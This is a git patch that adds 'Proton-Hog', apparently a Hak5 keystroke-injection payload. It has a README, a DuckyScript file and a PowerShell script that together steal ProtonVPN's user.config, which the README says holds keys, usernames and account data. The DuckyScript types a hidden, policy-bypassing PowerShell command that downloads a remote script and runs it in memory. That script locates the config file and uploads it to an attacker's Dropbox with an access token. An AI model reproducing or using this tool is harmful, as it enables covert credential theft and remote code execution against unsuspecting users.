From b1ebbcf21965e1c3d9db207ef0e78b46c58a1d9c Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Wed, 7 Dec 2022 20:58:51 -0500 Subject: [PATCH] Add files via upload --- .../library/exfiltration/Proton-Hog/README.md | 108 ++++++++++++++++++ .../exfiltration/Proton-Hog/payload.txt | 19 +++ .../library/exfiltration/Proton-Hog/s.ps1 | 41 +++++++ 3 files changed, 168 insertions(+) create mode 100644 payloads/library/exfiltration/Proton-Hog/README.md create mode 100644 payloads/library/exfiltration/Proton-Hog/payload.txt create mode 100644 payloads/library/exfiltration/Proton-Hog/s.ps1 diff --git a/payloads/library/exfiltration/Proton-Hog/README.md b/payloads/library/exfiltration/Proton-Hog/README.md new file mode 100644 index 0000000..6f2f2d1 --- /dev/null +++ b/payloads/library/exfiltration/Proton-Hog/README.md @@ -0,0 +1,108 @@ +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Proton-Hog + +A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. + +## Description + +This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file + +Then dropbox will be used to exfiltrate the files to cloud storage + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Proton-Hog/payload.txt b/payloads/library/exfiltration/Proton-Hog/payload.txt new file mode 100644 index 0000000..a19172d --- /dev/null +++ b/payloads/library/exfiltration/Proton-Hog/payload.txt @@ -0,0 +1,19 @@ +REM Title: Proton-Hog + +REM Author: atomiczsec + +REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. + + +REM Target: Windows 10 + +DEFINE TARGET_URL example.com + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/payloads/library/exfiltration/Proton-Hog/s.ps1 b/payloads/library/exfiltration/Proton-Hog/s.ps1 new file mode 100644 index 0000000..ff568d7 --- /dev/null +++ b/payloads/library/exfiltration/Proton-Hog/s.ps1 @@ -0,0 +1,41 @@ +function DropBox-Upload { + + [CmdletBinding()] + param ( + + [Parameter (Mandatory = $True, ValueFromPipeline = $True)] + [Alias("f")] + [string]$SourceFilePath + ) + $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token + $outputFile = Split-Path $SourceFilePath -leaf + $TargetFilePath="/$outputFile" + $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' + $authorization = "Bearer " + $DropBoxAccessToken + $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" + $headers.Add("Authorization", $authorization) + $headers.Add("Dropbox-API-Arg", $arg) + $headers.Add("Content-Type", 'application/octet-stream') + Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + } + +# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored + +if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { + try { + Write-Host "The VPN folder has not been found. " + } + catch { + throw $_.Exception.Message + } + } + + else { +$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" +cd $protonVpnPath +Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd +Get-ChildItem | cd + +# Upload user.config to dropbox +DropBox-Upload -f "user.config" +} \ No newline at end of file